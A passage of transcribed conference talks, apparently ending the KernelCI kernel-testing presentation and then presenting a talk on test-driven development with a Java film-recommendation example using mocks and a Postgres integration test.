range, a good version and a bad version, on a branch; we know the architecture, the compiler, the platform, all these conditions; so we can run a bisection for that. Then there are a few checks to remove false positives and duplicates, and when all that works you get a bisection email report sent to the KernelCI results mailing list. We use that list to moderate the reports, because we still want to avoid having the same result sent multiple times, typically when there's a problem and a fix has been made but it's not merged yet, or it's on a branch that hasn't been pulled into linux-next; for whatever reason, it can happen that the issue is known to be fixed and the regression is still present. So 90% of the work is automated, and we have this extra manual work at the end to make sure that we don't cause too much noise with email reports. That's something we can work on improving now that we have better support for tests as well. This currently leads to about one bug fixed per week in the kernel. Sometimes the patch gets reverted, or dropped, or rewritten, or a fix is added; every bisection leads to a different story. I've added links to the mailing list discussions for three recent ones, just to give you an idea of what that gives us.
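To make the bisection idea a bit more concrete, here is a minimal sketch of the general principle in Java. This is not KernelCI's actual implementation — the real thing builds a kernel and schedules a test job in a lab for every step — it is just an illustration of how a known-good/known-bad range plus a repeatable test converges on the first failing revision.

```java
import java.util.List;
import java.util.function.Predicate;

// Generic illustration of the bisection idea: given an ordered range of
// revisions where the first is known-good and the last is known-bad,
// repeatedly test the midpoint until the first bad revision is found.
public class BisectSketch {

    public static <R> R findFirstBad(List<R> revisions, Predicate<R> testPasses) {
        int good = 0;                     // known-good index (test passes)
        int bad = revisions.size() - 1;   // known-bad index (test fails)
        while (bad - good > 1) {
            int mid = good + (bad - good) / 2;
            if (testPasses.test(revisions.get(mid))) {
                good = mid;               // still passing: culprit is later
            } else {
                bad = mid;                // already failing: culprit is here or earlier
            }
        }
        return revisions.get(bad);        // first revision where the test fails
    }

    public static void main(String[] args) {
        // Toy example: revisions r0..r9, with a regression introduced at r6.
        List<String> revisions = List.of("r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7", "r8", "r9");
        Predicate<String> testPasses = rev -> rev.compareTo("r6") < 0;
        System.out.println("First bad revision: " + findFirstBad(revisions, testPasses));
    }
}
```

In KernelCI the "run one test" step is of course far more expensive than a function call — it means building a kernel and scheduling a job on a real platform — which is why the extra checks for false positives and duplicates mentioned above matter so much.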
Now that you know a bit better how KernelCI works, what it does, its purpose and how it all fits together, how can you take part in it? In the same way that the Linux kernel is a big open-source project following the open-source philosophy, with one repository that can be built in many ways and works for everyone using the kernel, on small devices and big devices, there is one upstream kernel. And in the same way, we want to have one KernelCI able to test that whole kernel. Of course that only works in the same way that open source works: you have many different contributors who care about their own use case and come together on one project. For KernelCI, the idea is to have all these different ways of running the kernel tested in all these different, matching ways, and to have all these tests pulled together, in what we can call an open testing philosophy. We don't just use open source: we also pool together the different hardware being used for testing the kernel and the different test definitions, and we regroup the results. And it has to be driven by the community, like open source design: it's not just the license of the code, it's the whole approach to how the system is designed. That's why it's important for members of the community to take part if the project is to really succeed in the long term. So there are different ways to contribute. You can contribute test results: if, as an individual or as an organization, you have some platforms you want to use to run KernelCI tests, you can for example set up a lab and have it connected to KernelCI to run the native tests. That will include things like the baseline tests, and you can have IGT, LTP, kselftest and all the other native tests easily run on your platforms if you create a LAVA lab. If you already have a way to automatically run tests on some platforms and it's not a LAVA lab, you can also connect it to KernelCI; we already have a component like that. And then, if you have a full CI system, where you already make your own kernel builds and run your own tests on your own platforms and everything is integrated and works on its own, you can submit the results produced by your CI system to the KCIDB database. The KCIDB database is used for common reporting. The final goal is to have one web dashboard, a superset of what we currently have, showing the results from the native tests but also from all the other CI systems that report to the same database, and then also to send a common email report on the mailing list, to have a complete picture of how one kernel revision has been tested, for example. We have a number of submitters already, like CKI and syzbot, as I've explained before. So if your company or your organization has something like that — it could be a Linux distribution, it could be an OEM, it could be anything. Typically we need it to be upstream focused, but the rules for that are a bit more flexible than for the native tests. For native tests we only monitor upstream branches, like maintainer branches, stable, next and mainline; for KCIDB you can be running a distro kernel. A real downstream branch from a complete integrated product would maybe not be too useful, but it depends: every test result is useful to some extent, because then we can compare things. If it's an Android phone with a 3.18 kernel, for example, we can compare that with the current 3.18 version; that's kind of an extreme example. But having extra data from real products can also be useful, and it's not something the KernelCI native tests can do. There is a lot of testing being done out there, and KCIDB can help bring all that data into one place to add value.
You can also contribute to the project more directly. You can submit your own test suite or test plan definition: like I've explained before, if you're a maintainer and you have your own set of scripts to test your part of the kernel, and you think it's going to be useful for other people, you can submit it and we can add it to the native tests of KernelCI. There's a user guide now about how to do that. You can also contribute to the core of KernelCI, for example by extending the build coverage, which might mean creating new Docker images with toolchains to build for a different type of architecture; it could be all kinds of things like that. Or by improving the pipeline: right now we're using Jenkins for the native tests and we want to start using our cloud resources more with Kubernetes. There's Jenkins X, I suppose that's one option, but we're also looking into newer technology like Tekton and maybe other types of frameworks to really make the best use of cloud resources. Also, if you try to set up your own instance of KernelCI and try to use it, you'll be relying on the documentation, and if you see any problems in the documentation, any gaps or mistakes or whatever, you can help improve it. For all these things, if you're not sure, or if you have any other topic you want to discuss, you can get in touch with us on the mailing list, kernelci@groups.io, or on IRC, #kernelci on Freenode. It's also of course possible to just send a pull request on GitHub, or to create issues, for example to ask for a new branch to be monitored, things like that. So what should we expect in 2021? The project has a Technical Steering Committee, which was defined as part of the Linux Foundation project setup. In 2021 we want to have it better defined, to actually define roles: some people would be in charge of the services being run in the cloud, others would be in charge of the documentation, or of responding to requests on the mailing list. There are a number of things like that that we should identify and document, and then we would have points of contact for each of them, to be more clear and transparent about what the project is and how it actually works from a practical point of view. We should have all of this documented in a public way. It's really a maturing phase for the project, and it would also make it easier for the community to contribute. It's about empowering the community to know where to start, to be able to add a test or whatever needs to be done, to keep the project evolving hand in hand with the community. Here I've just listed a few things that we could be doing in 2021; there's an infinite number of things. Some of them will be done by the current core KernelCI developers team, and some could be done by additional developers, members of the community. There isn't a clear border between these things; it's like in any open source project, you have the core contributors, people who contribute regularly and people who contribute occasionally. All these combined, we basically have a list of the things that seem the most important, but of course, if you have something to contribute because it's important to you, there's no reason why that can't be done.
So we've started work on running KUnit with Brendan Higgins from Google and Haydee, who is an intern as well. They did about 80% of the work, but it's not yet in production, and that's something we would like to complete. We also want to run more static checks, like devicetree validation; Isaias, an intern from Microsoft, did a great share of that work too, and it needs to be completed. And running Sparse, or whatever other static analysis can be done on the kernel. We also want to continue working with Pengutronix and other people on better support for labgrid, to try to make it as easy to use labgrid as LAVA with the native KernelCI tests. The other things I've already talked about in this talk: we want to gather user stories for a better web dashboard, redesign the pipeline using cloud infrastructure, improve automated bisection, and keep extending what we're already doing, with better build and functional test coverage, more maintainer branches for the native tests, and more KCIDB contributors. This is basically the set of things we should be taking care of. And of course, testing patches is also important, but it will mean more changes in the way KernelCI works, so that might come a bit later in 2021; still, we know it's an important topic. So thank you for watching, and I think now we can have a live Q&A session. On this slide I've put a few links and pointers to get in touch: the mailing list, GitHub and IRC. Thank you very much.
KernelCI has now been a Linux Foundation project for just over a year. During that time, it has set the basis needed to fulfil its mission of being the de facto upstream kernel test system. We can now build many more kernels, run many more tests and collate results from many more test labs. We also have a growing team of core contributors, an on-going commitment from our member companies as well as more presence in the kernel community. Together, we are gathering the momentum needed to start a trend. Now we need to make KernelCI a natural part of upstream kernel development and realise its true potential. The Community Survey in June 2020 showed there is great value and interest in having a more test-driven workflow. While this is going to be a long-term goal, we already have a process to let the community shape the KernelCI tools according to their own needs. This talk gives an overview of how it would work, essentially by allowing decisions to be based on feedback from the whole ecosystem (developers, maintainers, OEMs...).
10.5446/52812 (DOI)
Okay, hello. Hello, welcome to this talk, this presentation about TDD. I hope you will see some of the benefits of playing and working with TDD, and we'll try to look at the good and the bad parts around it. So thank you for joining me, and I hope you will like this presentation. First things first, thank you for attending and thank you for joining. These are difficult days, and I hope all of you will stay safe. So why this session? As I mentioned, it's about understanding why TDD matters: if we are able to build tests, why not write them before writing production code? We'll try to see the benefits of building code covered by tests, of doing it before versus doing it after. And even if that phrase makes you want to run away, please stay and see if it's interesting for you. A few words about who I am. I am Nacho, I'm from Barcelona, I'm a senior software engineer at Dynatrace, and I'm a TDD and clean code fan. I started to write code a long time ago, and I'm the founder of the Barcelona Java user group and of the Java and JVM Barcelona conference, a big conference that we organize every year here in Barcelona, a sunny city. I was a marathon runner, not too long ago, but I was. You can follow me on Twitter; I try to tweet about TDD, good patterns, cloud computing and these kinds of things, probably something about Kubernetes as well. And you can of course ask me any questions; just write them and I will try to answer if I'm able. I hope so. A small warning: everything I will be sharing here is based on my personal experience, so I hope you will understand that some opinions and ideas come from my own understanding. This is the agenda for today's session: where this idea of TDD comes from, the advantages and disadvantages around it, a description of the process and the rules, then a little bit about what I understand as good habits, not only around clean code but really about the process and TDD itself. Then we'll see an example and I will do a small recap. So let's start. Let's go back in history, to where everything started. It started around the 90s, when Kent Beck, let's say, rediscovered TDD while working on his first testing framework. It was when he was working at Chrysler and writing a book about extreme programming techniques. Basically, the idea goes back to when computers worked with input tapes: you would take the input tape, manually type the expected output tape, and then program until the actual output tape matched the expected output. That is really similar to what we are doing right now with xUnit frameworks. And yes, it was written more than 20 years ago, but it is still really interesting to have a look and understand all the extreme programming techniques that Kent Beck describes in his book.
So, for a moment, just imagine that you can find defects earlier, while you are writing, let's say designing, your tests, instead of waiting until the code is in production, or writing something and having to demonstrate later that it works. Imagine at the same time that you can easily detect regression errors, and, a really important point, that you always follow a simple process, always the same kind of small steps, where those steps help you detect that something went wrong in the small step you just did. In this way the steps you take are simple, and it's easier to detect any particular mistake. Your software is going to be easier to adapt in the long term and easier to refactor, because of the safety net you have from having a lot of tests, or at least some tests. So keep imagining this world, where your tests give you an idea of how a consumer, somebody else, is going to use your API or the software you're building, and where your tests work like living documentation. It's also likely that the software you develop this way will have fewer bugs, and this is something that has been demonstrated: there are a few references here, with some extracts and conclusions from studies done on teams using TDD, and they show that the development cost is lower, because you're going to have fewer bugs, which means fewer problems, and your software is going to be cheaper to maintain. So imagine all of that. And no, I'm not lying to you, but I'm also not selling the idea that TDD is going to solve all your problems. That's not true. But at least it's going to solve some of them. And yes, it has some disadvantages; I don't want to lie about this. There are some problems, things that are complicated. It's not so easy to start with, I have to say, because nobody tells you which is the best way of starting, so there are not many good places to start. And the majority of people are not using it daily, so you can't just go to your colleagues and ask, how are you doing TDD, how do you practice TDD? If nobody around you is doing it, how are we going to learn from our colleagues? It also has a high learning curve. It's not something where you read a two-page document and that's it; it depends on the complexity of your code, on your abilities as an engineer, on understanding the basic concepts and then promoting it and making it work in your day to day. It can also be a large investment: you're going to invest time and effort in doing these kinds of things in your company or in your team, and it's not something that everybody can do, because we have times where we have to deliver things and it's not always possible to do both at the same time, or because you have commitments with your customers. So no, it's not really easy.
So it's easy to see that applying TDD is difficult. It also means that from time to time you can forget the rules; it's really easy to forget to apply it or use it, because your team is not encouraging you to do it. For many people it also provokes resistance, in the sense of: I don't want to use it because it's a bit difficult for me, or because I don't understand it, or because I don't like it. It can also be corrupted into a way of pushing up your code coverage numbers, and TDD is not about that; TDD is about something else. And in the end it's extremely difficult to master, because there is no single truth here: there are a lot of practices and mechanisms for applying it, and how to do it is not really easy. I would say it's like this: you learned to write code a long time ago, like you probably learned to ride a bicycle. For me, learning TDD is like learning to ride a different bike, and when you are older, so it's going to be a bit more difficult. That's how I understand learning TDD: it's something that will make you think, oh, this is not what I thought or what I learned some time ago, and it's not going to be easy. But as everybody knows, the things that are really cool happen outside the comfort zone; the magic happens out of your comfort zone. And that's probably why many of us don't go and try TDD. So let's continue with the process and the rules, to understand what the process is and how it works. The process is just these three steps. It's not that difficult, but it is difficult to do it daily. Step number one is just to write the test and see how it fails. It's important that the test fails, because otherwise it makes no sense to write it. And it's important to specify in that test what we want to code; the idea is that this is the expectation we want to achieve: we want to test that, and when this test is green, we have solved that problem. That's the first step: write the test and see how it fails. The second step is to make that failing test pass by writing the minimal code that makes it pass; it's making it go from red to green. Nothing more than that: just write enough code to satisfy the behaviour that we want. Basically, make it work. And the last step, step number three, is to look at the picture we have once the test is green and see how we can improve the code without changing that behaviour. It's the refactor step: seeing how we can clean the code, and the tests of course, to remove duplication, make it better and make it more understandable for the next maintainer. That's it; that's the overall process. Then there are some rules that Robert Martin described some time ago, which I will try to explain in a summarized way.
Basically, the rules are: first, you are not allowed to write production code until you have a test that is failing. So you have to focus first on the test, and then demonstrate that the test passes; you cannot write production code that is not, let's say, pushed by a test. That's more or less the idea. Second, you are not allowed to write any more of a unit test than is sufficient to fail. So you basically start writing it, keep it minimal, and then maintain it; the test has to be consistent and maintained as well. And third, similar to the first rule, you are not allowed to write more production code than is sufficient to pass. It's about writing the minimum amount of code that takes the test from red to green. So don't build an over-engineered solution, write simple code, and don't start thinking about what happens if somebody tries this or that. Just write the simplest code you can, the simplest solution, and make the test pass. Those are more or less the three ideas you have to take into account when applying TDD. Related to that, let's move to the next topic, which is explaining some good habits that I have found. Probably many of you know all of this, but just as we now have some habits that are a little different from a year ago — even washing our hands more frequently — there are some habits that I have seen are really good for applying TDD. The first one is, before writing the production code, just see that the test is failing. It sounds stupid, but there are times when you are building something and you think, oh, probably when we hit this problem I can already put this condition there, and then the next test I write will already be solved. Don't over-engineer at that point and don't think about whether that is going to happen. Just focus first on writing a test and seeing it fail, because that is going to help you write the minimum of production code, nothing more than that. Another good habit I recommend is to not put many assertions in a test, so that if a test fails there is only one reason why it is failing. Then, if something fails, you will see a single reason — oh, the problem is here — and it's not difficult to work out how to solve it. Another recommendation is to write the assertion first when you're writing the test; just go and write the assertion first. I will show you how to do it in the demo part, but just remember that. And there are some recommendations that I normally use when writing a unit test. This is for Java code, but I think you can apply it wherever your language accepts this kind of description. The first one is a kind of mnemonic: the test class name can end with a suffix.
Of course, you have to think about whether it's possible, because you probably need to change your CI or CD system, but if you can, try to name your test classes so they end with Should. At this point you will see that there is almost no change — well, there is a small change that will help you see that the next method should describe something. Basically, you are describing something on that class ending in Should, and then your test methods can start with verbs describing the behaviour: should fail because of some reason, should accept whatever. That's the point of this Should suffix: it helps you describe the behaviour, the different cases or corner cases that you want to cover in your tests. And if you write it like this, describing it in plain English, it's going to be easier to understand. So if you then run the tests, you will see that the behaviours you have been describing as tests are easy to understand. In this case, for example, we have four tests that have run, and they are really clear about the behaviour, the scenario that we are testing. That's the overall point: our tests describe only behaviour, and our tests become clearer, more understandable in business terms, at a higher level rather than a lower level. If some test fails, of course we can have a look, but understanding it as plain English is easier, especially if someone else joins the team without knowing anything about the business, and we don't need to get into the details if we don't need to. So this description in plain English, which everybody can understand, is clearer no matter how you do your implementation. Another good recommendation about tests, and how to make them happen, is the order in which we write them, how we proceed when writing a test. In this case, as I mentioned before, I would recommend to name the class properly. The second thing is, of course, to create a test with the correct specification of what we expect, in this case return something when whatever situation happens. The next step is to define what you want to check. At this point, yes, I'm sure everybody will ask why I am doing that; it's because what I want is to describe, in particular, the conclusion of this test, how we are going to see that it is working. At this point, yes, the compiler will complain and everything is red, because I don't have the previous lines yet. But we are clearly focused on what we want, which is the conclusion. And then you go up: I have to trigger the code to exercise this behaviour, run it, and then fulfil the test with the rest of the setup, whatever else I have to do. So that's more or less how to do it: build the test from the bottom line going up, more or less. That's my idea.
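To make that naming convention concrete, here is a small sketch of what such a test class could look like with JUnit 5. The framework choice and the method names are my own illustration, borrowing the recommendation-service example that comes up later in the talk, and each test keeps a single assertion so there is only one reason for it to fail.

```java
import static org.junit.jupiter.api.Assertions.assertTrue;

import java.util.List;
import org.junit.jupiter.api.Test;

// The class name ends with "Should", so each method name reads as a
// plain-English sentence describing one behaviour or corner case.
class RecommendationServiceShould {

    @Test
    void return_films_ordered_by_average_rating() {
        // arrange / act would go here in a real test
        assertTrue(true); // placeholder assertion, just to illustrate the shape
    }

    @Test
    void return_an_empty_list_when_no_film_matches_the_genre() {
        assertTrue(List.of().isEmpty()); // placeholder assertion
    }
}
```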
But how do you start with all this? In terms of how a team, or a person, can start with these kinds of practices, I would say you can start small: with katas that you can do with your colleagues, with proofs of concept or personal projects. That's the best way to understand how to apply small things, and in particular to start really, really small. You can also keep practicing with communities or with your colleagues, try to make it happen, and internalise it so it becomes really familiar to you. And of course there is content online you can check. My final recommendation is that one of the best ways is simply to practice with somebody else: do pair programming with colleagues. That's one of the practices that, as many of you will know, helps in many directions, in many areas. For those who are not familiar with it, it's basically the activity where two people work on the same problem, like in this image, where you have a driver and a navigator. One is focused only on writing code — the driver is writing code — and the navigator is reviewing what is happening and looking ahead to where we are going in the next step; you can think of it as a more strategic view of what we are doing. And these roles keep switching: when the driver wants to swap, or because the pair agreed to do it in a particular way, every 10 or 15 minutes, it doesn't matter. The idea is that this swap helps people stay focused on the problem and also refreshes the mind: now I'm driving, so it feels a bit fresher this way. And this back and forth between working as an observer and as a driver helps you get more feedback while building the system, because at the same time you are reviewing the code. So one way or another, this helps the overall picture of the solution for your project. So now let's see an example based on actual code that I wrote, a small example. I will show you my slides. I normally try to do this as live coding, but I don't have time to do that and show it to you in this session, so I will try to explain it instead. The idea of this example is to build a service that can make recommendations. Let's say we are working at a startup that rents films over the internet, and our managers say: okay, we want to build something that can recommend films to the user. So it's a kind of recommendation system where you can pass in a particular genre and the system gives you back a list of films ordered by average rating: if the users give a film a nine or a ten, the results will put the higher-rated films before the lower-rated ones. Here you can see an example of what the service could look like: I will build a system that accepts a parameter, which is the genre we are going to ask for, and the system gives us back the list of films, more or less. Each film contains a title, the year when it was published, some tags and also a genre. Okay, so let's start with the first idea that I mentioned.
So the TDD process is really simple, as I mentioned: let's write the test first, and as I was saying before, let's start with the assertion, with the thing we want to focus on. At this point, as you can see, I was writing the assertion, and the compiler says: I don't understand anything about this RecommendationService, because in the code I don't have anything. And that's true, this service doesn't exist yet in the code. That's why the next step was exactly that: I created the service, nothing fancy, just a new class. The next point is to instantiate it, on line 11, as you can see on the left-hand side. And at the next step the compiler says: okay, now I understand what this service is, but I don't understand anything about this method and these parameters that you're using. So let's continue this approach and build that method, to see what we want to achieve, because we are still on the first step, which is defining the assertion and seeing how we can define this test. The test is still not even able to reach the red step. So we continue: we define the method on the right-hand side, and you can see there is a particular signature that we want. Basically, we want to return a list of films from a findByGenre kind of method: we get the genre as a parameter, and at some point we return a list of films. That's more or less where we are. So we continue defining this, because we want to achieve something; once the method at least compiles on the production-code side, we also have to include the Film class, which you can see on the right-hand side: basically an empty class that doesn't have anything in particular right now. But on the left-hand side, in the test, what we want is to look at the expected things: when we call that method with a particular genre, we want to verify it against the expected films. And this is what we want to keep describing: let's imagine that we want to verify that running this service with a particular scenario, which is science fiction, is going to return some data to us. In this case I'm building The Matrix — a good movie, by the way, and I like it very much, to be honest. What we want is to describe in this particular test that this film is one of the ones we want returned. But at the same time, what we probably have to do is define things on the Film class, because we can't create that film yet; as you can see on the previous slides, the compiler was saying: I don't understand, on the left-hand side, that Film has anything related to these parameters. And that's why we solve it by creating this constructor, which is exactly what we're doing on the right-hand side. But then, what we want to achieve is not to return only one film. It's going to be great to demonstrate, for testing purposes, that we get more than one result from the service, to see that they are ordered — one of the requirements was that we have to retrieve the films ordered by score. So basically, we need at least two films.
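As a rough reconstruction of where the test stands at this point — written assertion-first and still red — it might look something like this. The class, method and constructor signatures are assumptions based on the talk rather than the speaker's exact slides, and at this stage the service still has no repository dependency; that comes next.

```java
import static org.junit.jupiter.api.Assertions.assertEquals;

import java.util.List;
import org.junit.jupiter.api.Test;

// Snapshot of the first, failing test: the assertion was written first and
// everything above it was added only to make the compiler happy.
class RecommendationServiceShould {

    @Test
    void return_science_fiction_films_ordered_by_average_rating() {
        RecommendationService service = new RecommendationService();

        Film matrix = new Film("The Matrix", 1999,
                List.of("science fiction", "thriller", "action"), "science fiction");
        // A second film gets added in the next step, so ordering can be checked.
        List<Film> expectedFilms = List.of(matrix);

        assertEquals(expectedFilms, service.findByGenre("science fiction"));
    }
}
```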
That's why the next step is to fill in the constructor of this class with all the values that we receive, and the step after that is to create another film, because what we want to achieve, as I mentioned, is to verify that at least those two films come back in the order that we expect. So in this case I introduce another film; it could be Star Wars, another great movie that many of you have probably already seen, and I build it like this. So now the test is clear: when I run this test, I expect those films to come back in that order, and they have to have those values. It's not really fancy, but at this point I can run the test, because now it compiles. And now, of course, the method is telling me: this is not working. But at least we have the first step of TDD, which is to build the test and see it red. And yes, the test is red, because on the right-hand side you can see the implementation, and the implementation is doing nothing more than throwing an exception. Nothing fancy, but interesting in terms of putting the test in red. The next step is probably to actually do something: to have that code go somewhere to get information, to query those films. So basically we need a repository. This is something we introduce here as a dependency of the service: we introduce a FilmRepository to get this data back — imagine a database, for example. In this case, of course, the compiler was saying at this point: I don't have this repository, what do I do with this? So the next step is to create this repository, another class, a repository that does nothing for now but can at least be injected into the service so we are able to use it. If we try to run, of course, we get the same result, because we haven't changed anything and the test will not be green; but at the same time, let's double-check that the result of the test is not affected by introducing this dependency. So let's continue with the next step, which is to trigger something on the repository to find something, because otherwise the test will never pass. As you can see, we are still on red, and we are going to try to take it to green. Probably the simplest thing would be to return a hard-coded list containing exactly The Matrix and Episode IV, but that is not going to help us drive the solution towards what we expect, which is to use something else that helps us retrieve the information. That's why at this point we use the FilmRepository, and we are going to create a new method on it: as you can see, the FilmRepository is called with a particular method, and with a particular order, which is the default order that we expect. The compiler was saying: okay, I understand what FilmRepository is, but I don't know anything about this sort order or this findBy method. And that's why the next step is basically to create this sort order, which is an enum that we use on the right-hand side.
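Pulling the production side together, a minimal sketch of roughly what it might look like at this stage could be the following. All the names here (FilmRepository, SortOrder, findBy, findByGenre, the Film fields) are assumptions based on the talk, not the speaker's exact code.

```java
import java.util.List;

// The ordering the service asks for by default.
enum SortOrder {
    AVERAGE_RATING_DESC
}

// Value object for a film; equals/hashCode are deliberately missing for now,
// which matters later in the integration test.
class Film {
    private final String title;
    private final int year;
    private final List<String> tags;
    private final String genre;

    Film(String title, int year, List<String> tags, String genre) {
        this.title = title;
        this.year = year;
        this.tags = tags;
        this.genre = genre;
    }
}

// Kept as an interface so the service does not care whether the real
// implementation talks to Postgres, MySQL or anything else.
interface FilmRepository {
    List<Film> findBy(String genre, SortOrder sortOrder);
}

class RecommendationService {

    private final FilmRepository filmRepository;

    RecommendationService(FilmRepository filmRepository) {
        this.filmRepository = filmRepository;
    }

    // Minimal code to satisfy the test: just delegate to the repository,
    // asking for the default ordering by average rating.
    List<Film> findByGenre(String genre) {
        return filmRepository.findBy(genre, SortOrder.AVERAGE_RATING_DESC);
    }
}
```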
And below, you can see the findBy method on the FilmRepository side, completely empty for now. So if we continue, the result is exactly the same, because right now we haven't implemented anything on the repository side. At this point, when we run the test — well, sorry, it's not quite the same: right now we get a NullPointerException, as you can see in the test result, and that's because the FilmRepository used on line 40 of the production code is null. Why is it null? Because we haven't instantiated it on the test side: on the left-hand side, on line 20, you can see the FilmRepository is not instantiated. But we don't want to go to the database in a unit test, or at least we don't want to, because that's what integration tests are for; those are the tests designed for that purpose. We expect unit tests not to access the database and to remove all the external dependencies, while integration tests can connect to the database, talk to a third-party system, use a third-party API, work with files, and so on. The point is not to use dependencies that could affect the result or the performance of the unit test. That's why at this point we should think about what to do to solve the issue, because if we implement a repository that accesses the database, we are going to call out externally: hitting a database has an impact in terms of performance, and we would also be coupling the result of this service to the implementation of the repository. For the service it doesn't really matter which kind of repository you use — Postgres, MySQL, any other kind of database — it's not important for the service. So at this point we have to think about another solution for the FilmRepository, and the best idea is, instead of using a real implementation, to use a mock. That's why we introduce this idea here: because the repository is a dependency, we can replace what would be a real repository in production code with a mock repository that returns the information we expect. So now, here on line 24 on the left-hand side, you can see that the FilmRepository is defined as a mock; it's going to be called, but it's not going to return anything yet. We introduce that dependency and we run the test, and we see that there is nothing: the result is basically empty, because the mock isn't doing anything — it is called by this method, but its behaviour is not defined. So the failure is clear: we expect two elements, these two films, but what we get back from the mock when the findBy method is called is empty, so basically we don't have anything. What we have to do is define the condition for the repository: what we want it to return when this method is called. That's exactly what we want to do in the next step.
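A sketch of what that stubbing step might look like, assuming Mockito as the mocking library (the talk does not name one) and reusing the names from the earlier sketches:

```java
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;

import java.util.List;
import org.junit.jupiter.api.Test;

// Updated unit test: the repository is a mock, and its behaviour for this
// scenario is defined explicitly before exercising the service.
class RecommendationServiceShould {

    @Test
    void return_science_fiction_films_ordered_by_average_rating() {
        FilmRepository filmRepository = mock(FilmRepository.class);
        RecommendationService service = new RecommendationService(filmRepository);

        Film matrix = new Film("The Matrix", 1999,
                List.of("science fiction", "thriller", "action"), "science fiction");
        Film starWars = new Film("Star Wars: Episode IV", 1977,
                List.of("science fiction", "adventure", "fantasy"), "science fiction");
        List<Film> expectedFilms = List.of(matrix, starWars);

        // Define the condition: when the service asks for science fiction films
        // in the default order, the repository returns our two films.
        when(filmRepository.findBy("science fiction", SortOrder.AVERAGE_RATING_DESC))
                .thenReturn(expectedFilms);

        assertEquals(expectedFilms, service.findByGenre("science fiction"));
    }
}
```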
It's basically on line 33, in the test method on the left-hand side: you can see how we describe the scenario for the FilmRepository, which is saying, look, when this repository is called with this method, with this particular genre parameter and this sort order value, you are going to return these expected films, which is the list of films we created before. What we want is for the repository to return the list of films, and that list of films is the one the service gives us back. In other words, we want to demonstrate that the result comes from the repository, and that, depending on its implementation, the repository will give us back the result that we expect. At this point the test passes, and it passes because, as I mentioned, the mock is describing the behaviour we expect. But that's not really the end: the films come from the other component, and now we have two elements, the service and the repository, but the repository is not really implemented, because we mocked it. So now it's time to create the test for the repository. And what kind of test do we have to create for the repository? Probably an integration test, because what we want is to demonstrate that the repository works correctly with a particular implementation. So here we create a repository test, but this one is an integration test that is going to use a real database, connected to a real database, to check that we can return the list of films we want, filtered by genre and ordered by average rating. And again, we start with the assertion, describing that the film repository, called with that particular method, should return the expected films. So here what we do is create and instantiate the film repository on line 14, and again we expect the list of films. For better visibility I use films similar to the ones we used on the service test side, but now I created a class that is shared by these two test classes, basically a small class that holds those film values so they can be reused. Nothing more than that: we start this test, the test is going to call that method, but of course when we run it, the test runs the real implementation of the repository — we don't want to mock that here. And now we can see an UnsupportedOperationException being thrown. Why? Because we don't have the real implementation yet. So let's go for the real implementation.
For the real implementation on the repository side we need a few things, at least in Java. First we introduce some dependencies: on the right-hand side you can see how I changed the build, adding Testcontainers — a nice open source tool for using containers and databases in Java projects — the driver for Postgres, which is the database we use, and an open source connection pool, HikariCP. On the left-hand side is the implementation of the test. I have to get a data source, which is the last method, and I need to define a container — a Postgres container, on line 22 — where I use a particular version of the image, run it and pass in a script with the definition of the database schema. With this approach I am able to connect to the database, but I still need to implement the repository itself. This is the implementation I did — it is a big one — but basically it connects to the database, does a join and gets all the information back: it runs the select, parses the result properly, column by column, and returns it to the repository, which populates the list. On line 20 the list is defined, and from line 32 we process the results, read the records one by one and populate that list. And this is the structure of the database: we define three tables, one for films, one for users and one for ratings, and from line 26 downwards you can see that we insert some users, some films and some ratings, because what we want to achieve is to compute the average rating of the films and see which are the highest rated for a particular genre. On lines 30 to 32 you see the films — Matrix, Star Wars and Up in this case — and in the last column you see their genres: Matrix has science fiction, thriller and action; Star Wars has science fiction, adventure and fantasy; but Up has nothing related to science fiction, so Up should not be returned. If you look at the ratings, Matrix has an 8, a 9 and an 8, so the average will be around 8.3, while Star Wars has only one vote, which is a 7. So the order has to be Matrix first and then Star Wars, and Up is not returned at all because it does not have the science fiction genre. That is more or less the idea. On the left-hand side we have the schema, on the right-hand side we have the select: we send the select to the database, parse the results and return them to the repository. And this is the result we get: after applying the schema, populating the database and running the test again with this implementation, we expected a few things to be equal to something else — but they were not.
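Sketched in Python, the shape of that integration test looks roughly like this. The talk spins up a real Postgres with Testcontainers; to keep the sketch self-contained it uses an in-memory SQLite database instead, and the table and column names are invented for illustration. Note that the rows come back as plain tuples, which already compare by value — exactly the piece the Java walkthrough still has to add in the next step.

```python
# Same shape as the repository integration test: create the schema, insert fixture data,
# run the real query, assert on the filtered and ordered result. SQLite stands in for the
# talk's Testcontainers-managed Postgres; table/column names are illustrative.
import sqlite3

def test_repository_returns_films_filtered_by_genre_and_ordered_by_average_rating():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE films   (id INTEGER PRIMARY KEY, title TEXT, genres TEXT);
        CREATE TABLE ratings (film_id INTEGER, rate INTEGER);
        INSERT INTO films VALUES (1, 'Matrix',    'science fiction,thriller,action');
        INSERT INTO films VALUES (2, 'Star Wars', 'science fiction,adventure,fantasy');
        INSERT INTO films VALUES (3, 'Up',        'animation,adventure');
        INSERT INTO ratings VALUES (1, 8), (1, 9), (1, 8), (2, 7);
    """)
    rows = db.execute("""
        SELECT f.title, AVG(r.rate) AS avg_rate
        FROM films f JOIN ratings r ON r.film_id = f.id
        WHERE f.genres LIKE '%science fiction%'
        GROUP BY f.title
        ORDER BY avg_rate DESC
    """).fetchall()

    assert [title for title, _ in rows] == ["Matrix", "Star Wars"]   # 'Up' is filtered out by genre
```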
Okay, there is something we are missing, and it is basically the implementation of the default methods that we need on the Film class, on the right-hand side: the methods that are normally used for comparing instances and deciding whether two instances of a particular object, of Film, are equal or not. So we implement equals, a common method defined in Java that tells you when two Films are equal and where the differences are, and we also implement hashCode and toString, so that the content can be checked and the result can be serialized in a nicer, easier to understand way — a more readable representation of what an instance looks like. If we run the test again, now the test is green. The result is green because the comparison is now completely defined and the JVM understands how to compare two Film objects: it sees that the elements are exactly the same because they have the same title, the same list and order of genres, and the same year. That is why the test now passes. And at the end we have the full picture of a working solution that is easy to understand. We only wrote a few classes, but the result is really nice, because in the end we have only two test classes defined. One is the unit test that triggered everything: we started from the outside of the system, just with the description of the service and the method we needed, and then we went inwards, into the repository, and defined the needs of the repository, including the films and the details of the films. In production code we have only, let's say, four classes, and three classes on the test side, but the result is really nice in terms of coverage. This is one of the things I would like to highlight: because everything we wrote was driven by tests, you can see the code coverage of this particular solution — it is not a fancy solution, but the amount of code that is covered by tests is amazing. It is about 23 lines of code, and 